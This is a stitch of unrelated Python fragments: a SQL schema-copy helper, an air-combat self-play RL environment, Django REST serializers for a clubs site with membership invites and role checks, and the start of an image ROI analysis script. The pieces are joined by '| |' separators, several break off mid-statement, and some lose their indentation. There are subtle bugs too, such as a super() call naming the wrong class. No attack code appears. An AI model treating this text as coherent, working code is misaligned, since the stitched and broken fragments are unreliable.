def createSchemas(dstCatalogs: list, dstSchema: str, hiveTarget: str) -> None:
    """Create dstSchema in each destination catalog, adding an explicit
    storage location clause for lake-style catalogs, and wait until every
    create has completed."""
    group = CommandGroup()
    announce("creating schemas in {}".format(", ".join(dstCatalogs)))
    for cat in dstCatalogs:
        if cat in lakecats:
            clause = " with (location = '{l}/{c}/{s}')".format(l =
                hiveTarget, c = cat, s = dstSchema)
        else:
            clause = ""
        group.addSqlCommand("create schema if not exists "
                            f"{cat}.{dstSchema}{clause}")
    # Progress meter on all transfers across all destination schemas
    spinWait(group.ratioDone)
    group.waitOnAllCopies() # Should be a no-op
def copySchemaTables(srcCatalog: str, srcSchema: str, dstCatalogs: list[str],
hiveTarget: str, partition: bool, numbuckets: int):
# Never write to the source, or to unwritable catalogs
dstCatalogs = [c for c in dstCatalogs if not dontLoadCat(c)
or c == srcCatalog]
# If there are no catalogs to process, then just return
if len(dstCatalogs) < 1:
return
# First, create all the schemas that we need
createSchemas(dstCatalogs, dbschema, hiveTarget)
tpchschema = srcSchema if srcCatalog != hivecat else tpchbigschema
cg = CommandGroup()
announce("creating tables in {}".format(", ".join(dstCatalogs)))
for dstCatalog in dstCatalogs:
# Now copy the data over from our | |
#!usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import math
import time
import sys
sys.path.append('../..')
from envs.airCombateEnv.customization import init_posture
from envs.airCombateEnv.customization import REGISTRY_STATE as registry_state
from argument.argManage import args
from envs.unit import REGISTRY as registry_unit
if sys.version_info.major == 2:
import Tkinter as tk
else:
import tkinter as tk
np.set_printoptions(suppress=True)
class Env(object):
    def __init__(self):
        '''
        Base-class constructor.
        Subclasses must additionally define state_space, action_space,
        state_dim and action_dim, and populate the unit-instance lists
        red_unit_list / blue_unit_list.
        '''
        # Map settings
        self.AREA = args.map_area  # map extent (half-width of the square arena)
        # Visualization parameters
        self.SCALE = args.map_scale  # scale factor (world units -> pixels)
        self.SCOPE = self.AREA * self.SCALE  # Tkinter display range
        # Training parameters
        self.t = args.map_t  # time interval per step (seconds)
        self.td = self.t / args.map_t_n  # integration sub-interval within each step
        self.Sum_Oil = 100  # fuel, i.e. the maximum number of steps per episode
        ## aircraft lists
        self.red_unit_list = []
        self.blue_unit_list = []
    def _seed(self, seed):
        '''
        Seed numpy's global random number generator.
        '''
        np.random.seed(seed)
    def reset(self):
        '''
        Reset the environment.
        Returns:
            the current state (of all aircraft).
        '''
        raise NotImplementedError
    def step(self, *action):
        '''
        Args:
            actions for all aircraft in the environment.
        Returns:
            <next state, reward, done>; the current state may be omitted.
        Possible extensions:
            partial observations (obs) and extra global state information.
        '''
        raise NotImplementedError
    def _get_reward(self, *args):
        '''
        Compute the reward from the current aircraft information.
        Ideally takes everything the environment can provide and returns the
        reward value, so callers only care about inputs/outputs and new
        reward models only need to reimplement this function's internals.
        '''
        raise NotImplementedError
    def render(self):
        '''
        Visualize the environment.
        '''
        raise NotImplementedError
    def close(self):
        '''
        Close the visualization.
        '''
        raise NotImplementedError
    # Partially Observable Env for Multi-Agent
    # Interface for partially-observable multi-agent environments
    def get_state(self):
        raise NotImplementedError
    def get_state_shape(self):
        raise NotImplementedError
    def get_agent_obs(self, agent_id):
        raise NotImplementedError
    def get_agent_obs_shape(self):
        raise NotImplementedError
    def _get_avail_actions(self):
        raise NotImplementedError
    def _get_agent_avail_actions(self, agent_id):
        raise NotImplementedError
class AirCombatEnv(Env):
    """1-v-1 air-combat environment for self-play reinforcement learning.

    Blue and red aircraft each pick a roll action per step; rewards are
    shaped from antenna-train-angle (ATA), aspect-angle (AA) and distance,
    and an episode ends when one side holds an advantage long enough,
    fuel runs out, or an aircraft leaves the map.
    """
    def __init__(self):
        super(AirCombatEnv, self).__init__()
        # Aircraft parameters
        self.red = registry_unit["default"](None, 200, 80)  # red aircraft
        self.blue = registry_unit["default"](None, 200, 80)  # blue aircraft
        # Advantage / reward thresholds
        self.AA_range = 60  # aspect-angle window (degrees)
        self.ATA_range = 30  # antenna-train-angle window (degrees)
        self.Dis_max = 500  # maximum advantage distance
        self.Dis_min = 100  # minimum advantage distance
        self.adv_count = 0  # consecutive advantage counter (sign = which side)
        # Initial scenario mode: 0 random, 1 offensive, 2 defensive, 3 same-heading, 4 neutral
        self.init_scen = args.init_scen
        # Reinforcement-learning action interface
        self.action_space = ['l', 's', 'r']  # roll left, hold roll, roll right
        self.n_actions = len(self.action_space)
        self.action_dim = self.n_actions
        self.state_dim = len(registry_state[args.state_setting](self.red, self.blue, self.adv_count))
        # Episode outcome flag: 1 blue win, -1 red win, 0 draw/ongoing
        self.success = 0
    def reset_selfPlay(self):
        """Reset for a new self-play episode; returns (blue_state, red_state)."""
        # Reset episode bookkeeping
        self.reward_b = 0
        self.reward_r = 0
        self.done = False
        self.success = 0
        self.acts = [[], []]
        self.advs = []
        self.ATA_b = self.AA_b = 100
        self.ATA_r = self.AA_r = 100
        self.adv_count = 0
        # Initialize red/blue aircraft postures
        init_posture(self.init_scen, self.red, self.blue, args.random_r, args.random_b)
        self.red.oil = args.Sum_Oil
        self.blue.oil = args.Sum_Oil
        # print(self.red.ac_pos)
        # print(self.blue.ac_pos)
        # Compute ATA and AA angles for both sides
        self.ATA_b, self.AA_b = self._getAngle(self.red.ac_pos, self.blue.ac_pos, self.red.ac_heading,
                                               self.blue.ac_heading)
        self.ATA_r, self.AA_r = self._getAngle(self.blue.ac_pos, self.red.ac_pos, self.blue.ac_heading,
                                               self.red.ac_heading)
        # Distance between the two aircraft
        dis = self._get_dis(self.red.ac_pos, self.blue.ac_pos)
        # Advantage counter
        self.adv_count = self._calculate_Advantages(self.adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b)
        # reward shaping: angle terms combined with a distance term into a
        # potential (fai) used for reward differences between steps
        RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180))
        RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180))
        RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1))
        Rbl_b = RA_b * RD
        Rbl_r = RA_r * RD
        self.fai_b = -0.01 * Rbl_b
        self.fai_r = -0.01 * Rbl_r
        # Return the state of both aircraft
        s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count)
        s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count)
        return s_b, s_r
    def step_selfPlay(self, action_b, action_r):
        """Advance one step with blue's and red's actions; returns
        (blue_state, red_state, blue_reward, red_reward, done)."""
        # Record actions
        self.acts[0].append(action_b)
        self.acts[1].append(action_r)
        # Execute actions
        self.blue.move(action_b)
        self.red.move(action_r)
        # print(self.red.ac_pos)
        # print(self.blue.ac_pos)
        # Return the state of both aircraft
        s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count)
        s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count)
        # Compute rewards
        self.reward_b, self.reward_r, self.done, self.adv_count = self._get_reward(self.red.ac_pos, self.red.ac_heading,
                                                                                   self.blue.ac_pos,
                                                                                   self.blue.ac_heading,
                                                                                   self.adv_count)
        # print(s_b, s_r, self.reward_b, self.reward_r, self.done)
        return s_b, s_r, self.reward_b, self.reward_r, self.done
    def _getAngle(self, agent_A_pos, agent_B_pos, agent_A_heading, agent_B_heading):
        """
        param:
            agent_A_pos: position of aircraft A
            agent_B_pos: position of aircraft B
            agent_A_heading: heading angle of aircraft A
            agent_B_heading: heading angle of aircraft B
        return:
            B's AA and ATA angles
        Logic:
            Given the positions and heading angles of the two aircraft,
            compute aircraft B's ATA and AA angles
            (see doc/pic/envs_airCombateEnv_001.png), normalized to [-180, 180].
        """
        theta_br = 180 * math.atan2((agent_A_pos[1] - agent_B_pos[1]), (agent_A_pos[0] - agent_B_pos[0])) / math.pi
        theta_rb = 180 * math.atan2((agent_B_pos[1] - agent_A_pos[1]), (agent_B_pos[0] - agent_A_pos[0])) / math.pi
        if theta_br < 0:
            theta_br = 360 + theta_br
        if theta_rb < 0:
            theta_rb = 360 + theta_rb
        ATA = agent_B_heading - theta_br
        AA = 180 + agent_A_heading - theta_rb
        if ATA > 180:
            ATA = 360 - ATA
        elif ATA < -180:
            ATA = 360 + ATA
        if AA > 180:
            AA = 360 - AA
        elif AA < -180:
            AA = 360 + AA
        return ATA, AA
    def _get_reward(self, ac_pos_r, ac_heading_r, ac_pos_b, ac_heading_b, adv_count):
        """Compute (blue_reward, red_reward, done, adv_count) from current
        positions/headings. Terminal rewards: +/-2 for a sustained
        advantage win, -1 for fuel exhaustion or leaving the map;
        otherwise a potential-difference shaping reward minus a step cost."""
        dis = math.sqrt((ac_pos_r[0] - ac_pos_b[0]) * (ac_pos_r[0] - ac_pos_b[0])
                        + (ac_pos_r[1] - ac_pos_b[1]) * (ac_pos_r[1] - ac_pos_b[1]))
        # Compute ATA and AA for both sides
        self.ATA_b, self.AA_b = self._getAngle(ac_pos_r, ac_pos_b, ac_heading_r, ac_heading_b)
        self.ATA_r, self.AA_r = self._getAngle(ac_pos_b, ac_pos_r, ac_heading_b, ac_heading_r)
        # Update advantage counter
        adv_count = self._calculate_Advantages(adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b)
        # reward shaping potentials (same form as in reset_selfPlay)
        RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180))
        RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180))
        RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1))
        Rbl_b = RA_b * RD
        Rbl_r = RA_r * RD
        self.old_fai_b = self.fai_b
        self.old_fai_r = self.fai_r
        self.fai_b = -0.01 * Rbl_b
        self.fai_r = -0.01 * Rbl_r
        # Rewards and termination conditions
        # print(adv_count)
        if adv_count >= 9:
            # Blue held the advantage long enough: blue wins
            done = True
            self.success = 1
            reward_b = 2.0
            reward_r = -2.0
            # print("bsuccess")
        elif adv_count <= -9:
            # Red held the advantage long enough: red wins
            done = True
            self.success = -1
            reward_b = -2.0
            reward_r = 2.0
            # print("rsuccess")
        elif self.red.oil <= 0 and self.blue.oil <= 0:
            # Both out of fuel: draw, both penalized
            done = True
            self.success = 0
            reward_b = -1.0
            reward_r = -1.0
        elif (ac_pos_b[0] > args.map_area) or ((0 - ac_pos_b[0]) > args.map_area) or \
                (ac_pos_b[1] > args.map_area) or ((0 - ac_pos_b[1]) > args.map_area):
            # Blue left the map
            done = True
            self.success = 0
            reward_b = -1.0
            reward_r = (self.fai_r - self.old_fai_r) - 0.001
        elif (ac_pos_r[0] > args.map_area) or ((0 - ac_pos_r[0]) > args.map_area) or \
                (ac_pos_r[1] > args.map_area) or ((0 - ac_pos_r[1]) > args.map_area):
            # Red left the map
            done = True
            self.success = 0
            reward_b = (self.fai_b - self.old_fai_b) - 0.001
            reward_r = -1.0
        else:
            # Ongoing: potential difference minus a small per-step cost
            done = False
            reward_b = (self.fai_b - self.old_fai_b) - 0.001
            reward_r = (self.fai_r - self.old_fai_r) - 0.001
        return reward_b, reward_r, done, adv_count
    def _calculate_Advantages(self, adv_count, dis, AA_r, ATA_r, AA_b, ATA_b):
        """
        Update the red/blue advantage counter.
        :param adv_count: advantage count: negative = red advantage, positive = blue advantage
        :param dis: distance between the aircraft
        :param AA_r: red AA angle
        :param ATA_r: red ATA angle
        :param AA_b: blue AA angle
        :param ATA_b: blue ATA angle
        :return: updated advantage count
        """
        # Evaluate advantage conditions (within distance band and angle windows)
        if (dis < self.Dis_max) and (dis > self.Dis_min) \
                and (abs(AA_b) < self.AA_range) and (abs(ATA_b) < self.ATA_range):
            if adv_count >= 0:  # blue already had the advantage: accumulate
                adv_count += 1
            else:  # red had the advantage before: advantage switches sides
                adv_count = 1
        elif (dis < self.Dis_max) and (dis > self.Dis_min) \
                and (abs(AA_r) < self.AA_range) and (abs(ATA_r) < self.ATA_range):
            if adv_count <= 0:
                adv_count -= 1
            else:
                adv_count = -1
        else:
            adv_count = 0
        self.advs.append(adv_count)
        return adv_count
    def _get_dis(self, pos_a, pos_b):
        """
        Euclidean distance between position A and position B.
        :param pos_a: position A
        :param pos_b: position B
        :return: distance between A and B
        """
        dis = math.sqrt((pos_a[0] - pos_b[0]) * (pos_a[0] - pos_b[0])
                        + (pos_a[1] - pos_b[1]) * (pos_a[1] - pos_b[1]))
        return dis
    def creat_ALG(self):
        """Create the Tkinter window and canvas used by render()."""
        self.Tk = tk.Tk()
        self.Tk.title('1V1')
        self.Tk.canvas = tk.Canvas(self.Tk, bg='white',
                                   height=args.map_area * args.map_scale * 2,
                                   width=args.map_area * args.map_scale * 2)
        self.Tk.canvas.pack()
    def render(self):
        """Draw both aircraft on the canvas; destroys the window when done."""
        # Refresh the red aircraft
        self.r_show = self.xyz2abc(self.red.ac_pos)
        self.r = self.Tk.canvas.create_oval(
            self.r_show[0] - 1, self.r_show[1] - 1,
            self.r_show[0] + 1, self.r_show[1] + 1,
            fill='red')
        # Refresh the blue aircraft
        self.b_show = self.xyz2abc(self.blue.ac_pos)
        self.b = self.Tk.canvas.create_oval(
            self.b_show[0] - 1, self.b_show[1] - 1,
            self.b_show[0] + 1, self.b_show[1] + 1,
            fill='blue')
        self.Tk.update()
        time.sleep(0.05)
        if self.done:
            time.sleep(0.1)
            self.Tk.destroy()
    def close(self):
        """Destroy the Tkinter window."""
        self.Tk.destroy()
    def xyz2abc(self, pos):
        """Convert world coordinates to canvas pixel coordinates (origin at
        map center, y axis flipped). NOTE(review): the int dtype of
        np.array([0, 0]) truncates fractional pixel values -- confirm
        intended."""
        pos_show = np.array([0, 0])
        pos_show[0] = pos[0] * args.map_scale + args.map_area * args.map_scale
        pos_show[1] = args.map_area * args.map_scale - pos[1] * args.map_scale
        return pos_show
class AirCombatEnvMultiUnit(Env):
def __init__(self):
super(AirCombatEnv, self).__init__()
# 初始化双方飞机
id_number = 0
for name in args.red_unit_type_list: # args.red_unit_type_list为飞机类型名字列表
red_unit = registry_unit[name](id_number)
self.red_unit_list.append(red_unit)
id_number = id_number + 1
id_number = 0
for name in args.blue_unit_type_list:
blue_unit = registry_unit[name](id_number)
self.blue_unit_list.append(blue_unit)
id_number = id_number + 1
self.n_red_unit = len(args.red_unit_type_list)
self.n_blue_unit = len(args.blue_unit_type_list)
# 强化学习动作接口
# 【方案一】 直接使用联结动作空间,即 [a1, a2, ..., an, a1, a2, ..., an, ...]
# 注意:如果红蓝双方飞机数量不一致,则分别定义
self.single_action_space = ['l', 's', 'r'] # 向左滚转、维持滚转、向右滚转
self.action_space = self.single_action_space * self.n_red_unit
# # 【方案二】 使用decentralized policy,即动作空间只包含单独一个agent的
# self.action_space = ['l', 's', 'r']
self.action_dim = self.n_actions = len(self.action_space)
self.state_dim = 5 # 需要定义
# todo:reward判断指标
    def reset_selfPlay(self):
        """Reset for a multi-unit self-play episode (skeleton; state
        construction is still TODO)."""
        self.done = False
        self.success = 0
        self.acts = [[], []]  # todo-levin: store acts for one agent, or for both agents?
        # 1. Initialize red and blue aircraft
        # todo:
        # [Option 1]:
        #   Build an initialization function per real formation: place the
        #   center aircraft, then position every other aircraft relative to it.
        # [Option 2]:
        #   Pick a random region and randomly place each aircraft inside it.
        #   Iterate the lists to initialize each aircraft's state: roll, fuel, etc.
        # 2. Build the initial state
        for unit in self.red_unit_list:
            # Build the joint state vectors for red and blue respectively
            pass
        for unit in self.blue_unit_list:
            pass
# levin - [done]: add both actions
def step_selfPlay(self, action_blue_list, action_red_list):
'''
Parms:
action_b: list or tuple
action_r: list or tuple
'''
# | |
event that includes basic associated club information.
"""
club = serializers.SlugRelatedField(
queryset=Club.objects.all(), required=False, slug_field="code"
)
club_name = serializers.SerializerMethodField()
badges = BadgeSerializer(source="club.badges", many=True, read_only=True)
pinned = serializers.BooleanField(read_only=True)
def get_club_name(self, obj):
if obj.club is None:
return None
return obj.club.name
    class Meta:
        model = Event
        # Everything the club-scoped event serializer exposes, plus the
        # club linkage and display extras.
        fields = ClubEventSerializer.Meta.fields + [
            "club",
            "club_name",
            "badges",
            "pinned",
        ]
class EventWriteSerializer(EventSerializer):
    """
    A serializer for an event that is used when creating/editing the event.
    Enables URL checking for the url field.
    """
    url = serializers.CharField(
        max_length=2048, required=False, allow_blank=True, allow_null=True
    )
    def update(self, instance, validated_data):
        """
        Enforce only changing the meeting link to Zoom links for activities
        fair events.
        """
        if instance.type == Event.FAIR and "url" in validated_data:
            old_url = instance.url or ""
            new_url = validated_data.get("url", "")
            # if the two urls are not equal, perform additional checks
            if old_url != new_url:
                parsed_url = urlparse(new_url)
                # An empty url is allowed (clears the link); otherwise the
                # host must be under zoom.us.
                if ".zoom.us" not in parsed_url.netloc and new_url:
                    raise serializers.ValidationError(
                        {
                            "url": "You should use a Zoom link for the meeting url! "
                            "You can use the Zoom setup page to do this for you."
                        }
                    )
        return super().update(instance, validated_data)
class FavouriteEventSerializer(EventSerializer):
    """Alias of EventSerializer used when listing a user's favourite events."""
    pass
class ClubBoothSerializer(serializers.ModelSerializer):
    """Serializer for a club's fair booth, including its map placement
    (lat/long) and active time window."""
    # Clubs are referenced by their unique code rather than primary key.
    club = serializers.SlugRelatedField(queryset=Club.objects.all(), slug_field="code")
    class Meta:
        model = ClubFairBooth
        fields = (
            "name",
            "subtitle",
            "club",
            "image_url",
            "lat",
            "long",
            "start_time",
            "end_time",
        )
class MembershipInviteSerializer(serializers.ModelSerializer):
    """Serializer for claiming (or creating) a club membership invite.

    Updating an invite with a valid token claims it for the requesting
    user, creating the membership and deleting any pending membership
    request for the same club.
    """
    id = serializers.CharField(max_length=8, read_only=True)
    email = serializers.EmailField(read_only=True)
    # Secret token required to claim the invite; never exposed in responses.
    token = serializers.CharField(max_length=128, write_only=True)
    name = serializers.CharField(source="club.name", read_only=True)
    # Whether the resulting membership should be publicly visible.
    public = serializers.BooleanField(write_only=True, required=False)
    def create(self, validated_data):
        # "public" only applies when claiming; drop it on create.
        validated_data.pop("public", None)
        return super().create(validated_data)
    def update(self, instance, validated_data):
        """Claim the invite for the requesting user after token and
        (for Penn addresses) username checks."""
        user = self.context["request"].user
        public = validated_data.pop("public", False)
        if not self.validated_data.get("token") == self.instance.token:
            raise serializers.ValidationError("Missing or invalid token in request!")
        # if there is an owner and the invite is for a upenn email,
        # do strict username checking
        if (
            self.instance.email.endswith((".upenn.edu", "@upenn.edu"))
            and self.instance.club.membership_set.count() > 0
        ):
            # penn medicine emails have multiple aliases
            if not self.instance.email.endswith("@pennmedicine.upenn.edu"):
                invite_username = self.instance.email.rsplit("@", 1)[0]
                if not (
                    invite_username.lower() == user.username.lower()
                    or self.instance.email == user.email
                ):
                    raise serializers.ValidationError(
                        f"This invitation was meant for {invite_username}, "
                        f"but you are logged in as {user.username}!"
                    )
        # claim the invite and set the membership public status
        obj = instance.claim(user)
        obj.public = public
        obj.save()
        # if a membership request exists, delete it
        MembershipRequest.objects.filter(person=user, club=self.instance.club).delete()
        return instance
    class Meta:
        model = MembershipInvite
        fields = [
            "email",
            "id",
            "name",
            "public",
            "role",
            "title",
            "token",
            "updated_at",
        ]
class ExternalMemberListSerializer(serializers.ModelSerializer):
    """
    This serializer is used for listing non-sensitive data
    accessible to the public via CORS
    """
    name = serializers.CharField(source="person.username")
    image = serializers.SerializerMethodField("get_image")
    def get_image(self, obj):
        """Prefer the membership-specific image; fall back to the member's
        profile image; None if neither is set."""
        if obj.image:
            return obj.image.url
        profile_image = obj.person.profile.image
        if profile_image:
            return profile_image.url
        return None
    class Meta:
        model = Membership
        fields = ["name", "role", "description", "image"]
class UserMembershipInviteSerializer(MembershipInviteSerializer):
    """
    This serializer is used for listing the email invitations
    that the current user was sent.
    """
    # Unlike the parent, the token is readable here so the user can claim
    # their own invite.
    token = serializers.CharField(max_length=128)
    code = serializers.CharField(source="club.code", read_only=True)
    class Meta(MembershipInviteSerializer.Meta):
        fields = MembershipInviteSerializer.Meta.fields + ["code"]
class MembershipSerializer(ClubRouteMixin, serializers.ModelSerializer):
    """
    Used for listing which users are in a club for members who are not in the club.

    Respects each membership's "public" flag: anonymous-by-request members
    have their username/email/image hidden and their name replaced.
    """
    email = serializers.SerializerMethodField("get_email")
    username = serializers.SerializerMethodField("get_username")
    name = serializers.SerializerMethodField("get_full_name")
    person = serializers.PrimaryKeyRelatedField(
        queryset=get_user_model().objects.all(), write_only=True
    )
    role = serializers.IntegerField(write_only=True, required=False)
    image = serializers.SerializerMethodField("get_image")
    def get_username(self, obj):
        # Hidden for members who opted out of public listing.
        if not obj.public:
            return None
        return obj.person.username
    def get_full_name(self, obj):
        if not obj.public:
            return "Anonymous"
        return obj.person.get_full_name()
    def get_email(self, obj):
        # Requires both a public membership and an opted-in profile.
        if not obj.public or not obj.person.profile.show_profile:
            return None
        return obj.person.email
    def get_image(self, obj):
        """Membership image, falling back to the profile image, as an
        absolute URL when a request is available."""
        if not obj.public:
            return None
        if not obj.image and not obj.person.profile.image:
            return None
        image_url = obj.image.url if obj.image else obj.person.profile.image.url
        if image_url.startswith("http"):
            return image_url
        elif "request" in self.context:
            return self.context["request"].build_absolute_uri(image_url)
        else:
            return image_url
    def validate_role(self, value):
        """
        Ensure that users cannot promote themselves to a higher role.
        Also ensure that owners can't demote themselves without leaving another owner.

        NOTE(review): comparisons below imply roles are ordered with
        numerically smaller = more privileged (owner is the minimum value,
        consistent with role__lte=ROLE_OWNER) -- confirm against the model.
        """
        user = self.context["request"].user
        # The user whose membership is being modified (may differ from the
        # requester).
        mem_user_id = (
            self.instance.person.id if self.instance else self.initial_data["person"]
        )
        club_code = self.context["view"].kwargs.get(
            "club_code", self.context["view"].kwargs.get("code")
        )
        membership = Membership.objects.filter(
            person=user, club__code=club_code
        ).first()
        # Site-wide club managers bypass all role checks.
        if user.has_perm("clubs.manage_club"):
            return value
        if membership is None:
            raise serializers.ValidationError(
                "You must be a member of this club to modify roles!"
            )
        if membership.role > value:
            raise serializers.ValidationError(
                "You cannot promote someone above your own level."
            )
        # Self-demotion from owner is only allowed if another owner remains.
        if value > Membership.ROLE_OWNER and user.id == mem_user_id:
            if membership.role <= Membership.ROLE_OWNER:
                if (
                    Membership.objects.filter(
                        club__code=club_code, role__lte=Membership.ROLE_OWNER
                    ).count()
                    <= 1
                ):
                    raise serializers.ValidationError(
                        "You cannot demote yourself if you are the only owner!"
                    )
        return value
    def validate(self, data):
        """
        Normal members can only change a small subset of information.
        """
        user = self.context["request"].user
        club_code = self.context["view"].kwargs.get(
            "club_code", self.context["view"].kwargs.get("code")
        )
        membership = Membership.objects.filter(
            person=user, club__code=club_code
        ).first()
        # Non-officers may only toggle their own visibility/activity flags.
        if not user.is_superuser and (
            membership is None or membership.role > Membership.ROLE_OFFICER
        ):
            for field in data:
                if field not in {"active", "public"}:
                    raise serializers.ValidationError(
                        'Normal members are not allowed to change "{}"!'.format(field)
                    )
        return data
    class Meta:
        model = Membership
        fields = [
            "active",
            "email",
            "image",
            "name",
            "person",
            "public",
            "role",
            "title",
            "username",
            "description",
        ]
class AuthenticatedMembershipSerializer(MembershipSerializer):
    """
    Provides additional information about members, such as email address.
    Should only be available to users in the club.
    """
    role = serializers.IntegerField(required=False)
    email = serializers.EmailField(source="person.email", read_only=True)
    username = serializers.CharField(source="person.username", read_only=True)
    def get_full_name(self, obj):
        # Unlike the parent, never anonymize: club members may see real names.
        return obj.person.get_full_name()
    class Meta(MembershipSerializer.Meta):
        pass
class ClubMinimalSerializer(serializers.ModelSerializer):
    """
    Return only the club name, code, and approval status for a club.
    """
    class Meta:
        model = Club
        fields = ["name", "code", "approved"]
class ClubConstitutionSerializer(ClubMinimalSerializer):
    """
    Return the minimal information, as well as the files that the club has uploaded.
    """
    files = serializers.SerializerMethodField("get_constitution")
    def get_constitution(self, obj):
        """List constitution-like assets (.doc/.docx/.pdf or named
        'constitution'); names and urls are redacted unless the viewer may
        see pending clubs or is a member. Returns None when assets were
        not prefetched."""
        viewer = self.context["request"].user
        can_view = viewer.is_authenticated and viewer.has_perm(
            "clubs.see_pending_clubs"
        )
        has_member = bool(getattr(obj, "user_membership_set", False))
        if not hasattr(obj, "prefetch_asset_set"):
            return None
        visible = can_view or has_member
        docs = []
        for asset in obj.prefetch_asset_set:
            is_doc = asset.name.endswith((".docx", ".doc", ".pdf"))
            if is_doc or "constitution" in asset.name.lower():
                docs.append(
                    {
                        "name": asset.name if visible else None,
                        "url": asset.file.url if visible else None,
                    }
                )
        return docs
    class Meta(ClubMinimalSerializer.Meta):
        fields = ClubMinimalSerializer.Meta.fields + ["files"]
class ClubListSerializer(serializers.ModelSerializer):
"""
The club list serializer returns a subset of the information that the full
serializer returns.
Optimized for the home page, some fields may be missing if not necessary.
For example, if the subtitle is set, the description is returned as null.
This is done for a quicker response.
"""
tags = TagSerializer(many=True)
image_url = serializers.SerializerMethodField("get_image_url")
favorite_count = serializers.IntegerField(read_only=True)
membership_count = serializers.IntegerField(read_only=True)
is_favorite = serializers.SerializerMethodField("get_is_favorite")
is_subscribe = serializers.SerializerMethodField("get_is_subscribe")
is_member = serializers.SerializerMethodField("get_is_member")
email = serializers.SerializerMethodField("get_email")
subtitle = serializers.SerializerMethodField("get_short_description")
def get_email(self, obj):
if obj.email_public:
return obj.email
return "Hidden"
    def get_short_description(self, obj):
        """Subtitle if set; otherwise the first sentence of the description
        with HTML tags stripped and common entities unescaped."""
        if obj.subtitle:
            return obj.subtitle
        # return first sentence of description without html tags
        desc = obj.description.lstrip()[:1000]
        cleaned_desc = re.sub(r"<[^>]+>", "", desc)
        # Keep text up to (and including) the first '.', '\n' or '!', then
        # unescape the handful of entities we expect. NOTE: &amp; must be
        # replaced first so double-escaped entities are not mangled.
        return (
            "".join(re.split(r"(\.|\n|!)", cleaned_desc)[:2])
            .replace("&amp;", "&")
            .replace("&lt;", "<")
            .replace("&gt;", ">")
            .replace("&ndash;", "-")
            .replace("&mdash;", "-")
            .replace("&nbsp;", " ")
            .strip()
        )
def get_is_favorite(self, obj):
user = self.context["request"].user
if not user.is_authenticated:
return False
if hasattr(obj, "user_favorite_set"):
return bool(obj.user_favorite_set)
return obj.favorite_set.filter(person=user).exists()
def get_is_subscribe(self, obj):
user = self.context["request"].user
if not user.is_authenticated:
return False
if hasattr(obj, "user_subscribe_set"):
return bool(obj.user_subscribe_set)
return obj.subscribe_set.filter(person=user).exists()
    def get_is_member(self, obj):
        """Return the requesting user's membership role in this club, or
        False when unauthenticated / not a member.

        NOTE: the truthy return value is the role integer, not True --
        callers rely on receiving the role.
        """
        user = self.context["request"].user
        if not user.is_authenticated:
            return False
        # Prefer the prefetched membership list when the queryset provided one.
        if hasattr(obj, "user_membership_set"):
            mship = next(iter(obj.user_membership_set), None)
        else:
            mship = obj.membership_set.filter(person=user).first()
        if mship is None:
            return False
        return mship.role
def get_image_url(self, obj):
# use small version if exists
image = obj.image_small
if not image:
image = obj.image
# correct path rendering
if not image:
return None
if image.url.startswith("http"):
return image.url
elif "request" in self.context:
return self.context["request"].build_absolute_uri(image.url)
else:
return image.url
def get_fields(self):
    """
    Return the serializer's fields, optionally filtered down to the
    comma-separated names given in the request's "fields" GET parameter.
    """
    available = super().get_fields()
    # Merge in dynamically generated report fields when the serializer
    # class declares them.
    if hasattr(self.__class__, "get_additional_fields"):
        for group in self.__class__.get_additional_fields().values():
            for name in group.values():
                available[name] = ReportClubField(name, read_only=True)
    request = self.context.get("request", dict())
    raw = getattr(request, "GET", {}).get("fields", "")
    if not raw:
        return available
    requested = raw.split(",")
    chosen = {name: available[name] for name in requested if name in available}
    # An all-miss filter falls back to the complete field set.
    return chosen if len(chosen) > 0 else available
def to_representation(self, instance):
"""
Return the previous approved version of a club for users
that should not see unapproved content.
"""
if instance.ghost and not instance.approved:
user = self.context["request"].user
can_see_pending = user.has_perm("clubs.see_pending_clubs") or user.has_perm(
"clubs.manage_club"
)
is_member | |
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import cv2
import os
import pickle
import json
from roipoly.roipoly import RoiPoly, MultiRoi
import argparse
import datetime
import time
from threading import Timer, Thread
from OPTIMAS.utils.files_handling import images_list, read_fps, \
load_timing_data, read_image_size
def input_path():
    """Prompt the user for a neurons .png file or a saved ROI mask file.

    Returns:
        str: the raw path string typed by the user.

    Side effect: sets the module-level ``user_input_ok`` flag so a
    watchdog thread (see the commented-out prompt/timeout logic inside
    ``time_serie``) can detect that the prompt completed.
    """
    # Fixed: the original assigned a dead LOCAL user_input_ok; the threaded
    # caller (commented code using `global user_input_ok`) expects a module
    # flag, so the assignment had no observable effect.
    global user_input_ok
    user_input = input('input neurons png file or ROI mask file:')
    user_input_ok = True
    return user_input
def time_serie(input_data_folder, experiment, data_type='raw',
timing=True, draw_laser_timings=True, draw_dlp_timings=True,
time_start=0, time_stop=int(-1)):
data_export = [] # placeholder for saving data at the end
### PATHS ###
if data_type == 'raw':
path_input_images = f"{input_data_folder}/{experiment}/images/"
elif data_type == 'denoised':
path_input_images = f"{input_data_folder}/experiment_{experiment}/denoised_images/"
path_output = f"{input_data_folder}/{experiment}/"
# if roi comes from manual countours
roi_file_path = f'{path_output}/roi_masks.txt'
images = images_list(path_input_images)
#############
### ROIS ####
#############
## TODO: use the image from the dlp to do the ROIs ? what if not all rois
## on it ? Use a global Roi file ? How to define it ?
if os.path.isfile(roi_file_path):
print('ROI file exists')
with open(roi_file_path, "rb") as file:
rois = pickle.load(file)
else:
print('ROI file doesnt exists')
w,h = read_image_size(f'{input_data_folder}/{experiment}/{experiment}_info.json')
# TODO: ref image for defining rois, need to think about what it can be. The best would be a DIC image ?
